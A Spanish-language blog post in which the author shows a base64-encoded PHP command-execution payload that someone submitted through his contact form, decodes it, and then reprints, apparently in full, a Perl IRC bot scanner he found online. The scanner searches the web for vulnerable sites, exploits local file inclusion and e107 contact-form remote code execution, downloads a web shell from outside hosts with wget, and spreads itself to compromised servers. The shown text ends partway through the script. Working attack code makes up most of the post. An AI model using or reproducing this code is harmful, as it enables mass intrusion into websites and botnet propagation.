De nuevo el blog parando ataques

Vengo a enseñaros,  de nuevo,  como el sistema de seguridad del blog ownea a los que intententan algo hahaha. Este ataque, a decir verdad, a sido el mas “sofisticado” por decir algo…

Mirando mi log me encuentro con que alguien con malas intenciones a intentado meter en el formulario de contacto este code:

[php]eval(base64_decode(\’ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOi
IucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsN

CiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5j

dGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpe
w0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcm<

VzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3R

pb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGV

jKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJyk

pew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9n

ZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmd

W5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcG

Fzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9

iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBw

b3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZ

ikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw

0KfX0NCnJldHVybiAkcmVzOw0KfQ==\’));die();[/php] ¿base64_decode()? Ok, voy a mirar que me devuelve si descodifico el codigo en base64:

[codesyntax lang=”php” lines=”normal” lines_start=”0″ container=”pre_table” blockstate=”expanded”]
echo "v0pCr3w<br>";
echo "sys:".php_uname()."<br>";
$cmd="echo nob0dyCr3w";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
[/codesyntax]

¿Vaya vaya que tenemos aqui? hahaha. Bueno estube googleando un poquito para ver quien eran esos “v0pCr3w” y me tope con esto:

[codesyntax lang=”perl” lines=”normal” lines_start=”0″ container=”pre_table”]

#!/usr/bin/perl

# nob0dy Priv8 Scanner SE v1.2

# Coded by Vrs-hCk

# ander[at]antisecurity.org

# Last Edited: Jun 21 2010

# How to use:

# perl nob0dy.pl irc.server.net 6667 nick ident chan admin /usr/sbin/fakeproc

use HTTP::Request;

use LWP::UserAgent;

use IO::Socket;

use IO::Select;

use Socket;

use MIME::Base64;

my $datetime = localtime;

my $fakeproc  = $ARGV[6];

$ircserver = $ARGV[0] unless $ircserver;

my $ircport   = $ARGV[1];

my $nickname  = $ARGV[2];

my $ident     = $ARGV[3];

my $channel   = '#'.$ARGV[4];

my $admin     = $ARGV[5];

my $fullname  = "( nob0dy )";

my $nob0dy    = "15(7@2nob0dy15)";

my $lfilogo   = "15(7@2LFI15)";

my $lfdlogo   = "15(7@2LFD15)";

my $e107logo  = "15(7@2e10715)";

my $lficmd    = '!lfi';

my $lfdcmd    = '!lfd';

my $e107cmd   = '!e107';

my $injector  = "http://opendoor.ie/logs/logs";

my $botshell  = "http://antrax.us/tools/bot.pl";

my $uagent    = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6';

my $lfdtest   = "../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00";

my $lfdoutput = "root:(.+):(.+):(.+):(.+):(.+):(.+)";

if (@ARGV == 7) {

    print "\n[+] nob0dy Priv8 Scanner SE\n".

          "[+] IRC Host    : $ircserver\n".

          "[+] IRC Port    : $ircport\n".

          "[+] Bot Nick    : $nickname\n".

          "[+] Bot Ident   : $ident\n".

          "[+] Channel     : $channel\n".

          "[+] Bot Admin   : $admin\n".

          "[+] Process/PID : $fakeproc - $$\n\n";

}

else {

    print "\n[USAGE] perl $0 irc.server.net 6667 nick ident channel admin /usr/sbin/fakeproc\n\n";

    exit();

}

$SIG{'INT'}   = 'IGNORE';

$SIG{'HUP'}   = 'IGNORE';

$SIG{'TERM'}  = 'IGNORE';

$SIG{'CHLD'}  = 'IGNORE';

$SIG{'PS'}    = 'IGNORE';

chdir("/");

$ircserver = "$ARGV[0]" if $ARGV[0];

$0 = "$fakeproc"."" x 16;

my $pid = fork;

exit if $pid;

die "\n[!] Something Wrong !!!: $!\n\n" unless defined($pid);

our %irc_servers;

our %DCC;

my $dcc_sel = new IO::Select->new();

$sel_client = IO::Select->new();

sub sendraw {

    if ($#_ == '1') {

    my $socket = $_[0];

    print $socket "$_[1]\n";

    } else {

        print $IRC_cur_socket "$_[0]\n";

    }

}

sub connector {

    my $mynick = $_[0];

    my $ircserver_con = $_[1];

    my $ircport_con = $_[2];

    my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1);

    if (defined($IRC_socket)) {

        $IRC_cur_socket = $IRC_socket;

        $IRC_socket->autoflush(1);

        $sel_client->add($IRC_socket);

        $irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con";

        $irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con";

        $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;

        $irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost;

        nick("$mynick");

        sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$fullname");

        sleep 1;

    }

}

sub parse {

    my $servarg = shift;

    if ($servarg =~ /^PING \:(.*)/) {

        sendraw("PONG :$1");

    }

    elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {

        if (lc($1) eq lc($mynick)) {

            $mynick = $4;

            $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;

        }

    }

    elsif ($servarg =~ m/^\:(.+?)\s+433/i) {

        nick("$mynick".int rand(999));

    }

    elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {

        $mynick = $2;

        $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;

        $irc_servers{$IRC_cur_socket}{'nome'} = "$1";

        sendraw("MODE $mynick +Bx");

        sendraw("JOIN $channel");

        sleep(1);

        sendraw("PRIVMSG $channel :Hosted by: Midnightcr3w - Private ScanneR");

        sendraw("PRIVMSG $admin :Hi $admin im here !!!");

    }

}

my $line_temp;

while( 1 ) {

    while (!(keys(%irc_servers))) { connector("$nickname", "$ircserver", "$ircport"); }

    delete($irc_servers{''}) if (defined($irc_servers{''}));

    my @ready = $sel_client->can_read(0);

    next unless(@ready);

    foreach $fh (@ready) {

        $IRC_cur_socket = $fh;

        $mynick = $irc_servers{$IRC_cur_socket}{'nick'};

        $nread = sysread($fh, $ircmsg, 4096);

        if ($nread == 0) {

            $sel_client->remove($fh);

            $fh->close;

            delete($irc_servers{$fh});

        }

        @lines = split (/\n/, $ircmsg);

        $ircmsg =~ s/\r\n$//;

        if ($ircmsg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {

            my ($nick,$ident,$host,$path,$msg) = ($1,$2,$3,$4,$5);

            if ($path eq $mynick) {

                if ($msg =~ /^PING (.*)/) {

                    sendraw("NOTICE $nick :PING $1");

                }

                if ($msg =~ /^VERSION/) {

                    sendraw("NOTICE $nick :VERSION mIRC v6.21 Khaled Mardam-Bey");

                }

                if ($msg =~ /^TIME/) {

                    sendraw("NOTICE $nick :TIME ".$datetime."");

                }

                if (&isAdmin($nick) && $msg eq "!die") {

                    &shell("$path","kill -9 $$");

                }

                if (&isAdmin($nick) && $msg eq "!killall") {

                    &shell("$path","killall -9 perl");

                }

                if (&isAdmin($nick) && $msg eq "!reset") {

                    sendraw("QUIT :Restarting...");

                }

                if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {

                    sendraw("JOIN #".$1);

                }

                if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {

                    sendraw("PART #".$1);

                }

                if (&isAdmin($nick) && $msg =~ /^!nick (.+)/) {

                    sendraw("NICK ".$1);

                }

                if (&isAdmin($nick) && $msg =~ /^!pid/) {

                    sendraw($IRC_cur_socket, "PRIVMSG $nick :Fake Process/PID : $fakeproc - $$");

                }

                if (&isAdmin($nick) && $msg !~ /^!/) {

                    &shell("$nick","$msg");

                }

            }

            else {

                if (&isAdmin($nick) && $msg eq "!die") {

                    &shell("$path","kill -9 $$");

                }

                if (&isAdmin($nick) && $msg eq "!killall") {

                    &shell("$path","killall -9 perl");

                }

                if (&isAdmin($nick) && $msg eq "!reset") {

                    sendraw("QUIT :Restarting...");

                }

                if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {

                    sendraw("JOIN #".$1);

                }

                if (&isAdmin($nick) && $msg eq "!part") {

                    sendraw("PART $path");

                }

                if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {

                    sendraw("PART #".$1);

                }

                if (&isAdmin($nick) && $msg =~ /^\.sh (.*)/) {

                    &shell("$path","$1");

                }

                if (&isAdmin($nick) && $msg =~ /^$mynick (.*)/) {

                    &shell("$path","$1");

                }

                ##################################################################### HELP COMMAND

                if ($msg=~ /^!help/) {

                    my $helplogo = "15(7@2Help15)";

                    &notice("$nick","$helplogo 12LFI Vuln Scan:6 $lficmd [bug] [dork]");

                    &notice("$nick","$helplogo 12LFD Vuln Scan:6 $lfdcmd [bug] [dork]");

                    &notice("$nick","$helplogo 12e107 Vuln Scan:6 $e107cmd [bug] [dork]");

                }

                if ($msg=~ /^!response/ || $msg=~ /^!id/) {

                    if (&isFound($injector,"FJ3XiuRZulJfcu7mB13")) {

                        &notice("$nick","15(7@2Injector15)6 PHP Shell is 3UP");

                    } else {

                        &notice("$nick","15(7@2Injector15)6 PHP Shell is 4Down");

                    }

                }

                if (&isAdmin($nick) && $msg =~ /^!pid/) {

                    &notice("$nick","6Fake Process/PID : $fakeproc - $$");

                }

                ##################################################################### LFD SCAN

                if ($msg=~ /^$lfdcmd\s+(.+?)\s+(.*)/) {

                    if (my $pid = fork) {

                        waitpid($pid, 0);

                    }

                    else {

                        if (fork) { exit; } else {

                            my ($bug,$dork) = ($1,$2);

                            &msg("$path","$lfdlogo 12Dork :4 $dork");

                            &msg("$path","$lfdlogo 12Bugz :4 $bug");

                            &msg("$path","$lfdlogo 6Search Engine Loading ...");

                            &lfd_start($path,$bug,$dork,"GooGLe,AllTheWeb,Bing,ALtaViSTa,AsK,UoL,YahOo");

                        }

                        exit;

                    }

                }

                ##################################################################### LFIRCE SCAN

                if ($msg=~ /^$lficmd\s+(.+?)\s+(.*)/) {

                    if (my $pid = fork) {

                        waitpid($pid, 0);

                    }

                    else {

                        if (fork) { exit; } else {

                            if (&isFound($injector,"FJ3XiuRZulJfcu7mB13")) {

                                my ($bug,$dork) = ($1,$2);

                                &msg("$path","$lfilogo 12Dork :4 $dork");

                                &msg("$path","$lfilogo 12Bugz :4 $bug");

                                &msg("$path","$lfilogo 6Search Engine Loading ...");

                                &lfi_start($path,$bug,$dork,"GooGLe,AllTheWeb,Bing,ALtaViSTa,AsK,UoL,YahOo");

                            } else {

                                &msg("$path","[ $nick ] $lfilogo 4PHP Shell is Down!");

                            }

                        }

                        exit;

                    }

                }

                ##################################################################### e107 contact.php SCAN

                if ($msg=~ /^$e107cmd\s+(.+?)\s+(.*)/) {

                    if (my $pid = fork) {

                        waitpid($pid, 0);

                    }

                    else {

                        if (fork) { exit; } else {

                            if (&isFound($injector,"FJ3XiuRZulJfcu7mB13")) {

                                my ($bug,$dork) = ($1,$2);

                                &msg("$path","$e107logo 12Dork :4 $dork");

                                &msg("$path","$e107logo 12Bugz :4 $bug");

                                &msg("$path","$e107logo 6Search Engine Loading ...");

                                &e107_start($path,$bug,$dork,"GooGLe,AllTheWeb,Bing,ALtaViSTa,AsK,UoL,YahOo");

                            } else {

                                &msg("$path","[ $nick ] $e107logo 4PHP Shell is Down!");

                            }

                        }

                        exit;

                    }

                }

                #####################################################################

            }

        }

        for(my $c=0; $c<= $#lines; $c++) {

            $line = $lines[$c];

            $line = $line_temp.$line if ($line_temp);

            $line_temp = '';

            $line =~ s/\r$//;

            unless ($c == $#lines) {

                parse("$line");

            } else {

                if ($#lines == 0) {

                    parse("$line");

                } elsif ($lines[$c] =~ /\r$/) {

                    parse("$line");

                } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {

                    parse("$line");

                } else {

                    $line_temp = $line;

                }

            }

        }

    }

}

#########################################

sub lfd_start() {

    my $chan = $_[0];

    my $bug = $_[1];

    my $dork = $_[2];

    my $engine = $_[3];

    if ($engine =~ /google/i) {

        if (my $pid = fork) { waitpid($pid, 0); }

        else { if (fork) { exit; } else {

            &lfd($chan,$bug,$dork,"GooGLe");

        } exit; }

    }

    if ($engine =~ /alltheweb/i) {

        if (my $pid = fork) { waitpid($pid, 0); }

        else { if (fork) { exit; } else {

            &lfd($chan,$bug,$dork,"AllTheWeb");

        } exit; }

    }

    if ($engine =~ /bing/i) {

        if (my $pid = fork) { waitpid($pid, 0); }

        else { if (fork) { exit; } else {

            &lfd($chan,$bug,$dork,"Bing");

        } exit; }

    }

    if ($engine =~ /altavista/i) {

        if (my $pid = fork) { waitpid($pid, 0); }

        else { if (fork) { exit; } else {

            &lfd($chan,$bug,$dork,"ALtaViSTa");

        } exit; }

    }

    if ($engine =~ /ask/i) {

        if (my $pid = fork) { waitpid($pid, 0); }

        else { if (fork) { exit; } else {

            &lfd($chan,$bug,$dork,"AsK");

        } exit; }

    }

    if ($engine =~ /uol/i) {

        if (my $pid = fork) { waitpid($pid, 0); }

        else { if (fork) { exit; } else {

            &lfd($chan,$bug,$dork,"UoL");

        } exit; }

    }

    if ($engine =~ /yahoo/i) {

        if (my $pid = fork) { waitpid($pid, 0); }

        else { if (fork) { exit; } else {

            &lfd($chan,$bug,$dork,"YahOo");

        } exit; }

    }

}

sub lfi_start() {

    my $chan = $_[0];

    my $bug = $_[1];

    my $dork = $_[2];

    my $engine = $_[3];

    if ($engine =~ /google/i) {

        if (my $pid = fork) { waitpid($pid, 0); }

        else { if (fork) { exit; } else {

            &lfi($chan,$bug,$dork,"GooGLe");

        } exit; }

    }

    if ($engine =~ /alltheweb/i) {

        if (my $pid = fork) { waitpid($pid, 0); }

        else { if (fork) { exit; } else {

            &lfi($chan,$bug,$dork,"AllTheWeb");

        } exit; }

    }

    if ($engine =~ /bing/i) {

        if (my $pid = fork) { waitpid($pid, 0); }

        else { if (fork) { exit; } else {

            &lfi($chan,$bug,$dork,"Bing");

        } exit; }

    }

    if ($engine =~ /altavista/i) {

        if (my $pid = fork) { waitpid($pid, 0); }

        else { if (fork) { exit; } else {

            &lfi($chan,$bug,$dork,"ALtaViSTa");

        } exit; }

    }

    if ($engine =~ /ask/i) {

        if (my $pid = fork) { waitpid($pid, 0); }

        else { if (fork) { exit; } else {

            &lfi($chan,$bug,$dork,"AsK");

        } exit; }

    }

    if ($engine =~ /uol/i) {

        if (my $pid = fork) { waitpid($pid, 0); }

        else { if (fork) { exit; } else {

            &lfi($chan,$bug,$dork,"UoL");

        } exit; }

    }

    if ($engine =~ /yahoo/i) {

        if (my $pid = fork) { waitpid($pid, 0); }

        else { if (fork) { exit; } else {

            &lfi($chan,$bug,$dork,"YahOo");

        } exit; }

    }

}

sub e107_start() {

    my $chan = $_[0];

    my $bug = $_[1];

    my $dork = $_[2];

    my $engine = $_[3];

    if ($engine =~ /google/i) {

        if (my $pid = fork) { waitpid($pid, 0); }

        else { if (fork) { exit; } else {

            &e107($chan,$bug,$dork,"GooGLe");

        } exit; }

    }

    if ($engine =~ /alltheweb/i) {

        if (my $pid = fork) { waitpid($pid, 0); }

        else { if (fork) { exit; } else {

            &e107($chan,$bug,$dork,"AllTheWeb");

        } exit; }

    }

    if ($engine =~ /bing/i) {

        if (my $pid = fork) { waitpid($pid, 0); }

        else { if (fork) { exit; } else {

            &e107($chan,$bug,$dork,"Bing");

        } exit; }

    }

    if ($engine =~ /altavista/i) {

        if (my $pid = fork) { waitpid($pid, 0); }

        else { if (fork) { exit; } else {

            &e107($chan,$bug,$dork,"ALtaViSTa");

        } exit; }

    }

    if ($engine =~ /ask/i) {

        if (my $pid = fork) { waitpid($pid, 0); }

        else { if (fork) { exit; } else {

            &e107($chan,$bug,$dork,"AsK");

        } exit; }

    }

    if ($engine =~ /uol/i) {

        if (my $pid = fork) { waitpid($pid, 0); }

        else { if (fork) { exit; } else {

            &e107($chan,$bug,$dork,"UoL");

        } exit; }

    }

    if ($engine =~ /yahoo/i) {

        if (my $pid = fork) { waitpid($pid, 0); }

        else { if (fork) { exit; } else {

            &e107($chan,$bug,$dork,"YahOo");

        } exit; }

    }

}

#########################################

sub lfd() {

    my $chan = $_[0];

    my $bug = $_[1];

    my $dork = $_[2];

    my $engine = $_[3];

    my $count = 0;

    my @list = search_engine($chan,$bug,$dork,$engine,$lfdlogo);

    my $num = scalar(@list);

    if ($num > 0) {

        foreach my $site (@list) {

            $count++;

            if ($count == $num-1) { &msg("$chan","$lfdlogo(7@2$engine15)10 Scan finish for14 $dork"); }

            my $test = "http://".$site.$bug.$lfdtest;

            my $vuln = "http://".$site."12".$bug."6".$lfdtest;

            my $html = get_content($test);

            if ($html =~ /$lfdoutput/) {

                &msg("$chan","$lfdlogo(7@2$engine15)15(13@12Vuln15)4 ".$vuln." $nob0dy");

                sleep(3);

            }

        }

    }

}

sub lfi() {

    my $chan = $_[0];

    my $bug = $_[1];

    my $dork = $_[2];

    my $engine = $_[3];

    my $count = 0;

    my @list = search_engine($chan,$bug,$dork,$engine,$lfilogo);

    my $num = scalar(@list);

    if ($num > 0) {

        foreach my $site (@list) {

            $count++;

            if ($count == $num-1) { &msg("$chan","$lfilogo(7@2$engine15)10 Scan finish for14 $dork"); }

            my $dir = "../../../../../../../../../../../../../../../../../../../../../../../../";

            my $test = "http://".$site.$bug.$dir."/proc/self/environ%0000";

            my $vuln = "http://".$site."12".$bug."6".$dir."7/proc/self/environ%0000";

            my $shell = "http://".$site."12".$bug."6".$dir."7/tmp/x-treme%0000";

            my $html = get_content($test);

            if ($html =~ /DOCUMENT_ROOT=\// && $html =~ /HTTP_USER_AGENT=/) {

                if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {

                    my $code = 'echo "c0li#".php_uname()."#c0li"; if(@copy("'.$injector.'","/tmp/x-treme")) { echo "SUCCESS"; }';

                    my $res = lfi_env_query($test,encode_base64($code));

                    &lfi_spread_query($test);

                    $res =~ s/\n//g;

                    if ($res =~ /c0li#(.*)#c0liSUCCESS/sg) {

                        my $sys = $1;

                        &msg("$chan","$lfilogo(7@2$engine15)15(13@12X-SHell15)4 ".$shell." 15(7@3".$sys."15)$nob0dy");

                        sleep(4);

                    }

                    elsif ($res =~ /c0li#(.*)#c0li/sg) {

                        if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {

                            my $sys = $1;

                            my $upload = 'system("wget '.$injector.' -O /tmp/x-treme");';

                            my $wget = lfi_env_query($test,encode_base64($upload)); sleep(1);

                            my $check = get_content("http://".$site.$bug.$dir."/tmp/x-treme%0000"); sleep(1);

                            if ($check =~ /Hacked by Vrs-hCk/) {

                                &msg("$chan","$lfilogo(7@2$engine15)15(13@12X-SHeLL15)4 ".$shell." 15(7@3".$sys."15)$nob0dy");

                                sleep(4);

                            }

                            else {

                                &msg("$chan","$lfilogo(7@2$engine15)15(13@12SysTem15)4 ".$vuln." 15(7@3".$sys."15)$nob0dy");

                                sleep(4);

                            }

                        } exit; }

                    }

                    else { &msg("$chan","$lfilogo(7@2$engine15)15(13@12EnviRon15)4 ".$vuln." $nob0dy"); }

                } exit; } sleep(3);

            }

        }

    }

}

sub e107() {

    my $chan = $_[0];

    my $bug = $_[1];

    my $dork = $_[2];

    my $engine = $_[3];

    my $count = 0;

    my @list = search_engine($chan,$bug,$dork,$engine,$e107logo);

    my $num = scalar(@list);

    if ($num > 0) {

        foreach my $site (@list) {

            $count++;

            if ($count == $num-1) { &msg("$chan","$e107logo(7@2$engine15)10 Scan finish for14 $dork"); }

            my $test = "http://".$site.$bug;

            my $code = "ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ==";

            my $html = e107_rce_query($test,$code);

            if ($html =~ /v0pCr3w<br>sys:(.+?)<br>nob0dyCr3w/) {

                if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {

                    my $sys = $1;

                    my $upload = 'if(@copy("'.$injector.'","connect.php")) { echo "c0liSUKSESc0li"; }';

                    my $res = e107_rce_query($test,encode_base64($upload));

                    if ($res =~ /c0liSUKSESc0li/) {

                        &msg("$chan","$e107logo(7@2$engine15)15(13@12e107-SheLL15)10 http://".$site."12version.php 15(7@3".$sys."15)(7@12safemode-off15)");

&msg("ScanneD","$e107logo(7@2$engine15)15(13@12e107-SheLL15)10 http://".$site."12version.php 15(7@3".$sys."15)(7@12safemode-off15)");

                        sleep(5);

                    }

                    else {

                        &msg("$chan","$e107logo(7@2$engine15)15(13@12Vuln15)10 ".$test." 15(7@3".$sys."15)(7@12safemode-off15)");

                        sleep(5);

                    }

                    &e107_spread_query($test);

                    sleep(2);

                } exit; } sleep(5);

            }

            elsif ($html =~ /v0pCr3w<br>sys:(.+?)<br>/) {

                if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {

                    my $sys = $1;

                    my $upload = 'if(@copy("'.$injector.'","connect.php")) { echo "c0liSUKSESc0li"; }';

                    my $res = e107_rce_query($test,encode_base64($upload));

                    if ($res =~ /c0liSUKSESc0li/) {

                        &msg("$chan","$e107logo(7@2$engine15)15(13@12e107-SheLL15)10 http://".$site."12version.php 15(7@3".$sys."15)(7@4safemode-on15)");

                        sleep(5);

                    }

                    else {

                        &msg("$chan","$e107logo(7@2$engine15)15(13@12Vuln15)10 ".$test." 15(7@3".$sys."15)(7@4safemode-on15)");

                        sleep(5);

                    }

                } exit; } sleep(5);

            }

        }

    }

}

#########################################

sub search_engine() {

    my (@total,@clean);

    my $chan = $_[0];

    my $bug = $_[1];

    my $dork = $_[2];

    my $engine = $_[3];

    my $logo = $_[4];

    if ($engine eq "GooGLe") { my @google = google($dork); push(@total,@google); }

    if ($engine eq "AllTheWeb") { my @alltheweb = alltheweb($dork); push(@total,@alltheweb); }

    if ($engine eq "Bing") { my @bing = bing($dork); push(@total,@bing); }

    if ($engine eq "ALtaViSTa") { my @altavista = altavista($dork); push(@total,@altavista); }

    if ($engine eq "AsK") { my @ask = ask($dork); push(@total,@ask); }

    if ($engine eq "UoL") { my @uol = uol($dork); push(@total,@uol); }

    if ($engine eq "YahOo") { my @yahoo = yahoo($dork); push(@total,@yahoo); }

    @clean = clean(@total);

    &msg("$chan","$logo(7@2$engine15)12 Total:4 (".scalar(@total).")12 Clean:4 (".scalar(@clean).")");

    return @clean;

}

#########################################

sub rfi_os() {

    my $sys = "";

    my $url = $_[0];

    my $chk = get_content($url);

    if ($chk =~ /<br>sys:(.+?)<br>/sg) { $sys = $1; }

    return $sys;

}

sub rce_os() {

    my $sys = "";

    my $url = $_[0];

    my $chk = get_content($url);

    $chk =~ s/\n//;

    if ($chk =~ /999(.*)666/sg) { $sys = $1; }

    return $sys;

}

sub isFound() {

    my $status = 0;

    my $link = $_[0];

    my $reqexp = $_[1];

    my $res = get_content($link);

    if ($res =~ /$reqexp/) { $status = 1 }

    return $status;

}

sub get_content() {

    my $url = $_[0];

    my $ua = LWP::UserAgent->new(agent => $uagent);

    $ua->timeout(10);

    my $req = HTTP::Request->new(GET => $url);

    my $res = $ua->request($req);

    return $res->content;

}

sub lfi_env_query() {

    my $url = $_[0];

    my $code = $_[1];

    my $ua = LWP::UserAgent->new(agent => "<?eval(base64_decode('".$code."'));?>");

    $ua->timeout(10);

    my $req = HTTP::Request->new(GET => $url);

    my $res = $ua->request($req);

    return $res->content;

}

sub lfi_spread_query() {

    my $url = $_[0];

    my $botnick = 'x-bot['.(int rand(6666)).']';

    my $botchan = $channel;

    $botchan =~ s/\#//;

    my $code = "system('rm -rf /tmp/x-bot;wget $botshell -O /tmp/x-bot;perl /tmp/x-bot $ircserver $ircport $botnick xbot $botchan $admin /usr/bin/php');";

    my $ua = LWP::UserAgent->new(agent => "<?eval(base64_decode('".encode_base64($code)."'));?>");

    $ua->timeout(5);

    my $req = HTTP::Request->new(GET => $url);

    my $res = $ua->request($req);

}

sub e107_rce_query() {

    my $url = $_[0];

    my $code = $_[1];

    my $req = HTTP::Request->new(POST => $url);

    $req->content_type('application/x-www-form-urlencoded');

    $req->content("send-contactus=1&author_name=
PHP Code:
eval(base64_decode('".$code."'));die;
");

    my $ua = LWP::UserAgent->new(agent => $uagent);

    $ua->timeout(10);

    my $res = $ua->request($req);

    return $res->content;

}

sub e107_spread_query() {

    my $url = $_[0];

    my $code = "ICRjbWQ9ImNkIC90bXA7d2dldCBodHRwOi8vMHg2OS5uZXQvbG9nO3BlcmwgbG9nO3BlcmwgbG9nO3JtIC1yZiBsb2ciOw0KJGVzZWd1aWNtZD1leCgkY21kKTsNCmVjaG8gJGVzZWd1aWNtZDsNCmZ1bmN0aW9uIGV4KCRjZmUpew0KJHJlcyA9ICcnOw0KaWYgKCFlbXB0eSgkY2ZlKSl7DQppZihmdW5jdGlvbl9leGlzdHMoJ2V4ZWMnKSl7DQpAZXhlYygkY2ZlLCRyZXMpOw0KJHJlcyA9IGpvaW4oIlxuIiwkcmVzKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3NoZWxsX2V4ZWMnKSl7DQokcmVzID0gQHNoZWxsX2V4ZWMoJGNmZSk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzeXN0ZW0nKSl7DQpAb2Jfc3RhcnQoKTsNCkBzeXN0ZW0oJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygncGFzc3RocnUnKSl7DQpAb2Jfc3RhcnQoKTsNCkBwYXNzdGhydSgkY2ZlKTsNCiRyZXMgPSBAb2JfZ2V0X2NvbnRlbnRzKCk7DQpAb2JfZW5kX2NsZWFuKCk7DQp9DQplbHNlaWYoQGlzX3Jlc291cmNlKCRmID0gQHBvcGVuKCRjZmUsInIiKSkpew0KJHJlcyA9ICIiOw0Kd2hpbGUoIUBmZW9mKCRmKSkgeyAkcmVzIC49IEBmcmVhZCgkZiwxMDI0KTsgfQ0KQHBjbG9zZSgkZik7DQp9fQ0KcmV0dXJuICRyZXM7DQp9IA==";

    my $req = HTTP::Request->new(POST => $url);

    $req->content_type('application/x-www-form-urlencoded');

    $req->content("send-contactus=1&author_name=
PHP Code:
eval(base64_decode('".$code."'));die;
");

    my $ua = LWP::UserAgent->new(agent => $uagent);

    $ua->timeout(10);

    my $res = $ua->request($req);

}

######################################### SEARCH ENGINE

sub google() {

    my @list;

